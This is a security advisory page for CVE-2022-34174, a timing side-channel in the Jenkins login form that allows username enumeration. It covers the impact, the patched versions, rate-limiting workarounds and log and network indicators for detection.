CVE-2022-34174
📋 TL;DR
This vulnerability in Jenkins creates a timing side-channel in the login form that allows attackers to distinguish between invalid usernames and valid usernames with incorrect passwords. This enables username enumeration attacks, which can be used as reconnaissance for credential stuffing or brute-force attacks. All Jenkins instances using the Jenkins user database security realm are affected.
💻 Affected Systems
- Jenkins
📦 What is this software?
Jenkins by Jenkins
Jenkins by Jenkins
⚠️ Risk & Real-World Impact
Worst Case
Attackers can enumerate valid usernames and then perform targeted password attacks, potentially compromising user accounts and gaining unauthorized access to the Jenkins instance.
Likely Case
Attackers enumerate valid usernames to build targeted credential stuffing lists, increasing success rates for subsequent authentication attacks.
If Mitigated
With rate limiting and strong password policies, impact is limited to reconnaissance that doesn't directly lead to account compromise.
🎯 Exploit Status
Exploitation requires measuring response timing differences, which can be automated with simple scripts. No authentication required to attempt username enumeration.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Jenkins 2.356, LTS 2.332.4
Vendor Advisory: https://www.jenkins.io/security/advisory/2022-06-22/#SECURITY-2566
Restart Required: Yes
Instructions:
1. Backup your Jenkins instance. 2. Upgrade to Jenkins 2.356 or LTS 2.332.4 or later. 3. Restart Jenkins service. 4. Verify the fix by checking the version.
🔧 Temporary Workarounds
Enable rate limiting
allConfigure rate limiting on authentication attempts to make timing attacks impractical
Configure via Jenkins security settings or use reverse proxy rate limiting
Switch authentication method
allUse external authentication providers (LDAP, OAuth, etc.) instead of Jenkins user database
Configure via Jenkins > Manage Jenkins > Configure Global Security
🧯 If You Can't Patch
- Implement network-level rate limiting using WAF or reverse proxy
- Monitor authentication logs for unusual patterns of login attempts
🔍 How to Verify
Check if Vulnerable:
Check Jenkins version via Manage Jenkins > About Jenkins or via CLICheck Version:
java -jar jenkins.war --version or check Jenkins web interfaceVerify Fix Applied:
Verify version is 2.356 or LTS 2.332.4 or later, and test login timing differences are no longer observable📡 Detection & Monitoring
Log Indicators:
- Multiple failed login attempts with varying usernames
- Patterns of login attempts with consistent timing measurements
Network Indicators:
- Unusual volume of POST requests to /j_spring_security_check endpoint
SIEM Query:
source="jenkins.log" AND "Failed to authenticate" AND count by src_ip > threshold